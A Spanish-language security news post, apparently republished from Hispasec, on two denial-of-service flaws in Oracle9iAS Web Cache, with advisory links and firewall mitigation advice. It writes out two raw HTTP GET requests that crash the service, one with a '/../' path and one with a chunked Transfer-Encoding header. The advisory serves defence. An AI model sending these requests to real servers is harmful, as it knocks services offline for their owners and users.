Dos problemas de denegación de servicio en Oracle9iAS Web Cache


Se han detectado dos problemas de denegación de servicio en Oracle Web
Cache, uno de los componentes la suite Oracle Application Server.

Oracle Web Cache es una parte de la suite Oracle Application Server. El Web Cache server está diseñado para ser implementado delante de Oracle
Web server y actuar como cache de servidor de proxy inverso.





Existen dos ataques diferentes de denegación de servicio, que podrá
provocar la caída del servicio Web Cache. Las condiciones de
denegación de servicio pueden explotarse mediante simples peticiones
HTTP al servicio Web Cache.

La primera de las denegaciones de servicio se produce al efectuar una
petición HTTP GET que contenga al menos un punto-punto-barra en la
URI:

GET /../ HTTP/1.0
Host: whatever
[CRLF]
[CRLF]

La segunda de las denegaciones se produce al efectuar una petición GET
mal construida:

GET / HTTP/1.0
Host: whatever
Transfer-Encoding: chunked
[CRLF]
[CRLF]

Oracle no va a publicar ningún parche para evitar este problema.

Se recomienda emplear técnicas de firewall para restringir el acceso
al puerto de administración de Web Cache.
Usar la característica "Secure Subnets" de la herramienta Web Cache
Manager para proporcionar acceso únicamente a los administradores
desde una lista de direcciones IP o subredes permitidas.

Más información:

Oracle9iAS Web Cache Denial of Service
http://www.atstake.com/research/advisories/2002/a102802-1.txt

Oracle9i Application Server - Web Cache Administration Tool Crash on
Malformed Request
http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf



Fuente:Hispasec

Otras noticias de interés:

¿Gustavo Narea? ¿Y este quién rayos se cree?
Al amigo "Gustavo Narea", de la ciudad de Valencia, Estado Carabobo, Venezuela; se le subieron los humos. ...
Licencia Creative Commons
Creative Commons nace como proyecto gracias a la iniciativa del profesor de derecho de la Universidad de Stanford y estudioso de los fenómenos sociales y culturales del ciberespacio Lawrence Lessig, siendo una organización sin fines de lucro que pe...
Corregidas dos vulnerabilidades en OpenOffice y LibreOffice
Las suites ofimáticas de código abierto, LibreOffice y OpenOffice, se han actualizado recientemente para, entre otros cambios y mejoras, corregir dos vulnerabilidades remotas....
W32.HLLW.Deloder, un nuevo gusano que busca máquinas Windows en Internet
Durante las últimas horas del domingo, diversos servicios de vigilancia de incidencias de seguridad en la red han notado un incremento en el tráfico con destino al puerto tcp/445. Se trata de un nuevo gusano, W32.HLWW.Deloder, que busca máquinas W...
Publicada la versión final de la AGPL v3
Ha sido publicada la versión definitiva de la Affero General Public License v3 (AGPL v3) ...
Plugin de imagenes en Wordpress con #malware
Investigadores de AVAST Virus Labs han visto un aumento de las infecciones de malware dentro de los sitios WordPress, una aplicación de código abierto usada frecuentemente por los bloggers, debido a una vulnerabilidad en un plugin de imagenes y los...
En Argentina es legal distribuir virus
La Sala I de la Cámara Federal obreseyó a un ex empleado de una empresa acusado de enviar virus a través del correo electrónico, pese a que se probó que su conducta le ocasionó a la empresa pérdida de tiempo y perjuicios económicos, infor...
Cumpleaños de nuestro amigo Spectro
Felicidades en tu día amigo, recibe un cordial abrazo de tus amigos del Team Xombra. ...
MS-Office no dará soporte a OOXML hasta el MS-Office 14
Parece sorprendente, pero así es: si ayer hablábamos del anuncio que ha confirmado la compatibilidad nativa con ODF, PDF y XPS en Office 2007 para dentro de un año, ahora nos enteramos de lo que no será soportado es el estándar ISO OOXML, que fu...
Cómo mantener una carpeta secreta en Windows XP
Una de las preguntas que con más frecuencia respondemos en nuestro correo de lectores es: "¿Cómo hago para ponerle una contraseña a una carpeta en Windows?"...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • cache
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • denegacion
  • dos
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • ias
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • oracle
  • pgp
  • php
  • problemas
  • sabayon
  • seguridad
  • servicio
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra